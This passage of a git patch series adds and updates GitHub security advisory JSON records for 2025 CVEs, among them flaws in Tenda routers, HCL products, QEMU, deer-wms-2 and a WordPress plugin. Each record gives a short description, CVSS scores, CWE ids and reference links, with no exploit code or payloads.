], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-17T18:15:27Z" diff --git a/advisories/unreviewed/2025/07/GHSA-rqmp-p5qj-qxjh/GHSA-rqmp-p5qj-qxjh.json b/advisories/unreviewed/2025/07/GHSA-rqmp-p5qj-qxjh/GHSA-rqmp-p5qj-qxjh.json new file mode 100644 index 0000000000000..0d99cbc0a41db --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-rqmp-p5qj-qxjh/GHSA-rqmp-p5qj-qxjh.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rqmp-p5qj-qxjh", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-51088" + ], + "details": "Tenda AC8V4 V16.03.34.06` was discovered to contain stack overflow at /goform/WifiGuestSet. The manipulation of the argument `shareSpeed` leads to stack-based buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51088" + }, + { + "type": "WEB", + "url": "https://github.com/TL-SN/IOT/blob/main/Tenda/Tenda-AC8v4%20%20V16.03.34.06/CVE-2025-51088.md" + }, + { + "type": "WEB", + "url": "http://tenda.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-v3gf-cfpp-pjjg/GHSA-v3gf-cfpp-pjjg.json b/advisories/unreviewed/2025/07/GHSA-v3gf-cfpp-pjjg/GHSA-v3gf-cfpp-pjjg.json new file mode 100644 index 0000000000000..b044c77e68282 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-v3gf-cfpp-pjjg/GHSA-v3gf-cfpp-pjjg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v3gf-cfpp-pjjg", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-31953" + ], + "details": "HCL iAutomate includes hardcoded credentials which may result in potential exposure of confidential data if intercepted or accessed by unauthorized parties.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31953" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0122646" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T21:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vqm9-87vr-9765/GHSA-vqm9-87vr-9765.json b/advisories/unreviewed/2025/07/GHSA-vqm9-87vr-9765/GHSA-vqm9-87vr-9765.json new file mode 100644 index 0000000000000..4499c70a6c2af --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vqm9-87vr-9765/GHSA-vqm9-87vr-9765.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqm9-87vr-9765", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-45731" + ], + "details": "A group deletion race condition in 2FAuth v5.5.0 causes data inconsistencies and orphaned accounts when a group is deleted while other operations are pending.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "WEB", + "url": "https://github.com/Bubka/2FAuth/security/advisories/GHSA-ph6w-q992-7qrx" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-45731" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T14:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-w788-65r2-9qhp/GHSA-w788-65r2-9qhp.json b/advisories/unreviewed/2025/07/GHSA-w788-65r2-9qhp/GHSA-w788-65r2-9qhp.json new file mode 100644 index 0000000000000..d55189101c801 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-w788-65r2-9qhp/GHSA-w788-65r2-9qhp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w788-65r2-9qhp", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-31955" + ], + "details": "HCL iAutomate is affected by a sensitive data exposure vulnerability. This issue may allow unauthorized access to sensitive information within the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31955" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0122646" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T21:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-wj97-j26v-v8wp/GHSA-wj97-j26v-v8wp.json b/advisories/unreviewed/2025/07/GHSA-wj97-j26v-v8wp/GHSA-wj97-j26v-v8wp.json new file mode 100644 index 0000000000000..243b45e60e530 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-wj97-j26v-v8wp/GHSA-wj97-j26v-v8wp.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj97-j26v-v8wp", + "modified": "2025-07-24T21:30:39Z", + "published": "2025-07-24T21:30:39Z", + "aliases": [ + "CVE-2025-6260" + ], + "details": "The embedded web server on the thermostat listed version ranges contain a vulnerability that allows unauthenticated attackers, either on the local area network or from the Internet via a router with port forwarding set up, to gain direct access to the thermostat's embedded web server and reset user credentials by manipulating specific elements of the embedded web interface.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6260" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T21:15:52Z" + } +} \ No newline at end of file From 02355345677a82ec142666117a6d564ff9cc8c11 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 00:32:01 +0000 Subject: [PATCH 140/323] Publish Advisories GHSA-9xw9-4ffg-hrqp GHSA-jh2p-77g5-p9f8 GHSA-226v-5vj5-g2fc GHSA-2rv3-3939-3h9h GHSA-3xrq-8f4x-pwv7 GHSA-fp38-37p3-qj24 GHSA-g98p-wqr8-r32r GHSA-qc8c-76wh-84xm --- .../GHSA-9xw9-4ffg-hrqp.json | 9 +++- .../GHSA-jh2p-77g5-p9f8.json | 9 +++- .../GHSA-226v-5vj5-g2fc.json | 52 +++++++++++++++++++ .../GHSA-2rv3-3939-3h9h.json | 36 +++++++++++++ .../GHSA-3xrq-8f4x-pwv7.json | 36 +++++++++++++ .../GHSA-fp38-37p3-qj24.json | 36 +++++++++++++ .../GHSA-g98p-wqr8-r32r.json | 34 ++++++++++++ .../GHSA-qc8c-76wh-84xm.json | 44 ++++++++++++++++ 8 files changed, 252 insertions(+), 4 deletions(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-226v-5vj5-g2fc/GHSA-226v-5vj5-g2fc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-2rv3-3939-3h9h/GHSA-2rv3-3939-3h9h.json create mode 100644 advisories/unreviewed/2025/07/GHSA-3xrq-8f4x-pwv7/GHSA-3xrq-8f4x-pwv7.json create mode 100644 advisories/unreviewed/2025/07/GHSA-fp38-37p3-qj24/GHSA-fp38-37p3-qj24.json create mode 100644 advisories/unreviewed/2025/07/GHSA-g98p-wqr8-r32r/GHSA-g98p-wqr8-r32r.json create mode 100644 advisories/unreviewed/2025/07/GHSA-qc8c-76wh-84xm/GHSA-qc8c-76wh-84xm.json diff --git a/advisories/unreviewed/2022/05/GHSA-9xw9-4ffg-hrqp/GHSA-9xw9-4ffg-hrqp.json b/advisories/unreviewed/2022/05/GHSA-9xw9-4ffg-hrqp/GHSA-9xw9-4ffg-hrqp.json index cf1b8fbca256e..31ca94a5d453a 100644 --- a/advisories/unreviewed/2022/05/GHSA-9xw9-4ffg-hrqp/GHSA-9xw9-4ffg-hrqp.json +++ b/advisories/unreviewed/2022/05/GHSA-9xw9-4ffg-hrqp/GHSA-9xw9-4ffg-hrqp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9xw9-4ffg-hrqp", - "modified": "2022-05-17T04:19:02Z", + "modified": "2025-07-25T00:30:20Z", "published": "2022-05-17T04:19:02Z", "aliases": [ "CVE-2014-9188" @@ -18,6 +18,10 @@ "type": "WEB", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-350-01" }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-14-350-01" + }, { "type": "WEB", "url": "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD%202014-344-01" @@ -25,7 +29,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-77" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-jh2p-77g5-p9f8/GHSA-jh2p-77g5-p9f8.json b/advisories/unreviewed/2022/05/GHSA-jh2p-77g5-p9f8/GHSA-jh2p-77g5-p9f8.json index 0e4d4e75ef853..5acd612cd21d5 100644 --- a/advisories/unreviewed/2022/05/GHSA-jh2p-77g5-p9f8/GHSA-jh2p-77g5-p9f8.json +++ b/advisories/unreviewed/2022/05/GHSA-jh2p-77g5-p9f8/GHSA-jh2p-77g5-p9f8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jh2p-77g5-p9f8", - "modified": "2022-05-17T04:17:47Z", + "modified": "2025-07-25T00:30:20Z", "published": "2022-05-17T04:17:47Z", "aliases": [ "CVE-2014-9190" @@ -21,11 +21,16 @@ { "type": "WEB", "url": "https://wdnresource.wonderware.com/support/docs/_SecurityBulletins/Security_Bulletin_LFSEC00000104.pdf" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-15-008-02" } ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-121" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-226v-5vj5-g2fc/GHSA-226v-5vj5-g2fc.json b/advisories/unreviewed/2025/07/GHSA-226v-5vj5-g2fc/GHSA-226v-5vj5-g2fc.json new file mode 100644 index 0000000000000..9ab294624090f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-226v-5vj5-g2fc/GHSA-226v-5vj5-g2fc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-226v-5vj5-g2fc", + "modified": "2025-07-25T00:30:21Z", + "published": "2025-07-25T00:30:21Z", + "aliases": [ + "CVE-2025-8124" + ], + "details": "A vulnerability was found in deerwms deer-wms-2 up to 3.3. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /system/role/authUser/unallocatedList. The manipulation of the argument params[dataScope] leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8124" + }, + { + "type": "WEB", + "url": "https://gitee.com/deerwms/deer-wms-2/issues/ICLRF0" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317509" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317509" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619692" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T00:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2rv3-3939-3h9h/GHSA-2rv3-3939-3h9h.json b/advisories/unreviewed/2025/07/GHSA-2rv3-3939-3h9h/GHSA-2rv3-3939-3h9h.json new file mode 100644 index 0000000000000..0d8edb8a7e877 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2rv3-3939-3h9h/GHSA-2rv3-3939-3h9h.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2rv3-3939-3h9h", + "modified": "2025-07-25T00:30:21Z", + "published": "2025-07-25T00:30:20Z", + "aliases": [ + "CVE-2025-7742" + ], + "details": "An authentication vulnerability exists in the LG Innotek camera model LNV5110R firmware that allows a malicious actor to upload an HTTP POST request to the devices non-volatile storage. This action may result in remote code execution that allows an attacker to run arbitrary commands on the target device at the administrator privilege level.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7742" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-205-04" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-288" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T00:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3xrq-8f4x-pwv7/GHSA-3xrq-8f4x-pwv7.json b/advisories/unreviewed/2025/07/GHSA-3xrq-8f4x-pwv7/GHSA-3xrq-8f4x-pwv7.json new file mode 100644 index 0000000000000..c17a301acc30a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3xrq-8f4x-pwv7/GHSA-3xrq-8f4x-pwv7.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3xrq-8f4x-pwv7", + "modified": "2025-07-25T00:30:20Z", + "published": "2025-07-25T00:30:20Z", + "aliases": [ + "CVE-2025-0250" + ], + "details": "HCL IEM is affected by an authorization token sent in cookie vulnerability.  A token used for authentication and authorization is being handled in a manner that may increase its exposure to security risks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0250" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0122368" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-319" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T00:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-fp38-37p3-qj24/GHSA-fp38-37p3-qj24.json b/advisories/unreviewed/2025/07/GHSA-fp38-37p3-qj24/GHSA-fp38-37p3-qj24.json new file mode 100644 index 0000000000000..4de5d36fdc928 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-fp38-37p3-qj24/GHSA-fp38-37p3-qj24.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fp38-37p3-qj24", + "modified": "2025-07-25T00:30:21Z", + "published": "2025-07-25T00:30:20Z", + "aliases": [ + "CVE-2025-0249" + ], + "details": "HCL IEM is affected by an improper invalidation of access or JWT token vulnerability.  A token was not invalidated which may allow attackers to access sensitive data without authorization.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0249" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0122368" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T00:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-g98p-wqr8-r32r/GHSA-g98p-wqr8-r32r.json b/advisories/unreviewed/2025/07/GHSA-g98p-wqr8-r32r/GHSA-g98p-wqr8-r32r.json new file mode 100644 index 0000000000000..029e854741d6b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-g98p-wqr8-r32r/GHSA-g98p-wqr8-r32r.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g98p-wqr8-r32r", + "modified": "2025-07-25T00:30:20Z", + "published": "2025-07-25T00:30:20Z", + "aliases": [ + "CVE-2025-22165" + ], + "details": "This Medium severity ACE (Arbitrary Code Execution) vulnerability was introduced in version 4.2.8 of Sourcetree for Mac.\n\nThis ACE (Arbitrary Code Execution) vulnerability, with a CVSS Score of 5.9, allows a locally authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction. \n\nAtlassian recommends that Sourcetree for Mac users upgrade to the latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions. See the release notes https://www.sourcetreeapp.com/download-archives .\n\nYou can download the latest version of Sourcetree for Mac from the download center https://www.sourcetreeapp.com/download-archives .\n\nThis vulnerability was found through the Atlassian Bug Bounty Program by Karol Mazurek (AFINE).", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:H/SC:H/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-22165" + }, + { + "type": "WEB", + "url": "https://jira.atlassian.com/browse/SRCTREE-8217" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T23:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qc8c-76wh-84xm/GHSA-qc8c-76wh-84xm.json b/advisories/unreviewed/2025/07/GHSA-qc8c-76wh-84xm/GHSA-qc8c-76wh-84xm.json new file mode 100644 index 0000000000000..1079e7787774b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qc8c-76wh-84xm/GHSA-qc8c-76wh-84xm.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc8c-76wh-84xm", + "modified": "2025-07-25T00:30:20Z", + "published": "2025-07-25T00:30:20Z", + "aliases": [ + "CVE-2025-3614" + ], + "details": "The ElementsKit Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the URL attribute of a custom widget in all versions up to, and including, 3.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3614" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.4.8/modules/widget-builder/controls/control-type-url.php#L9" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.4.8/modules/widget-builder/controls/widget-writer.php#L366" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1627e235-7836-43dc-a3f6-7f79da6ab229?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T23:15:26Z" + } +} \ No newline at end of file From d07a3b07daf79e8fd63aa238891b222b4785639d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 25 Jul 2025 03:32:07 +0000 Subject: [PATCH 141/323] Publish Advisories GHSA-29jc-x5h4-vgx9 GHSA-399m-rf4f-w5x4 GHSA-6983-97r4-xj5x GHSA-6g2p-hv5m-576f GHSA-c2q6-w8rj-wvhw GHSA-j2v5-7544-9fpc GHSA-m2q6-2g6v-7xqv GHSA-q6hp-29g8-7j6j GHSA-rq48-53j8-jrwr GHSA-xhhw-h278-mxj8 GHSA-xwcj-w2w2-2g7c --- .../GHSA-29jc-x5h4-vgx9.json | 44 +++++++++++++++ .../GHSA-399m-rf4f-w5x4.json | 36 ++++++++++++ .../GHSA-6983-97r4-xj5x.json | 52 +++++++++++++++++ .../GHSA-6g2p-hv5m-576f.json | 36 ++++++++++++ .../GHSA-c2q6-w8rj-wvhw.json | 36 ++++++++++++ .../GHSA-j2v5-7544-9fpc.json | 36 ++++++++++++ .../GHSA-m2q6-2g6v-7xqv.json | 36 ++++++++++++ .../GHSA-q6hp-29g8-7j6j.json | 44 +++++++++++++++ .../GHSA-rq48-53j8-jrwr.json | 52 +++++++++++++++++ .../GHSA-xhhw-h278-mxj8.json | 52 +++++++++++++++++ .../GHSA-xwcj-w2w2-2g7c.json | 56 +++++++++++++++++++ 11 files changed, 480 insertions(+) create mode 100644 advisories/unreviewed/2025/07/GHSA-29jc-x5h4-vgx9/GHSA-29jc-x5h4-vgx9.json create mode 100644 advisories/unreviewed/2025/07/GHSA-399m-rf4f-w5x4/GHSA-399m-rf4f-w5x4.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6983-97r4-xj5x/GHSA-6983-97r4-xj5x.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6g2p-hv5m-576f/GHSA-6g2p-hv5m-576f.json create mode 100644 advisories/unreviewed/2025/07/GHSA-c2q6-w8rj-wvhw/GHSA-c2q6-w8rj-wvhw.json create mode 100644 advisories/unreviewed/2025/07/GHSA-j2v5-7544-9fpc/GHSA-j2v5-7544-9fpc.json create mode 100644 advisories/unreviewed/2025/07/GHSA-m2q6-2g6v-7xqv/GHSA-m2q6-2g6v-7xqv.json create mode 100644 advisories/unreviewed/2025/07/GHSA-q6hp-29g8-7j6j/GHSA-q6hp-29g8-7j6j.json create mode 100644 advisories/unreviewed/2025/07/GHSA-rq48-53j8-jrwr/GHSA-rq48-53j8-jrwr.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xhhw-h278-mxj8/GHSA-xhhw-h278-mxj8.json create mode 100644 advisories/unreviewed/2025/07/GHSA-xwcj-w2w2-2g7c/GHSA-xwcj-w2w2-2g7c.json diff --git a/advisories/unreviewed/2025/07/GHSA-29jc-x5h4-vgx9/GHSA-29jc-x5h4-vgx9.json b/advisories/unreviewed/2025/07/GHSA-29jc-x5h4-vgx9/GHSA-29jc-x5h4-vgx9.json new file mode 100644 index 0000000000000..42ef6e179b247 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-29jc-x5h4-vgx9/GHSA-29jc-x5h4-vgx9.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-29jc-x5h4-vgx9", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2015-10143" + ], + "details": "The Platform theme for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the *_ajax_save_options() function in all versions up to 1.4.4 (exclusive). This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10143" + }, + { + "type": "WEB", + "url": "https://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/wp_platform_exec.rb" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c16fab08-6b2c-433a-9105-fc15f5c52575?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T03:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-399m-rf4f-w5x4/GHSA-399m-rf4f-w5x4.json b/advisories/unreviewed/2025/07/GHSA-399m-rf4f-w5x4/GHSA-399m-rf4f-w5x4.json new file mode 100644 index 0000000000000..edae22c43862a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-399m-rf4f-w5x4/GHSA-399m-rf4f-w5x4.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-399m-rf4f-w5x4", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2025-54566" + ], + "details": "hw/pci/pcie_sriov.c in QEMU through 10.0.3 has a migration state inconsistency, a related issue to CVE-2024-26327.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54566" + }, + { + "type": "WEB", + "url": "https://lore.kernel.org/qemu-devel/20250713-wmask-v1-1-4c744cdb32c0@rsg.ci.i.u-tokyo.ac.jp" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-642" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T03:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6983-97r4-xj5x/GHSA-6983-97r4-xj5x.json b/advisories/unreviewed/2025/07/GHSA-6983-97r4-xj5x/GHSA-6983-97r4-xj5x.json new file mode 100644 index 0000000000000..2a5a902a29bfa --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6983-97r4-xj5x/GHSA-6983-97r4-xj5x.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6983-97r4-xj5x", + "modified": "2025-07-25T03:30:27Z", + "published": "2025-07-25T03:30:27Z", + "aliases": [ + "CVE-2025-8125" + ], + "details": "A vulnerability was found in deerwms deer-wms-2 up to 3.3. It has been rated as critical. Affected by this issue is some unknown functionality of the file /system/role/authUser/allocatedList. The manipulation of the argument params[dataScope] leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": 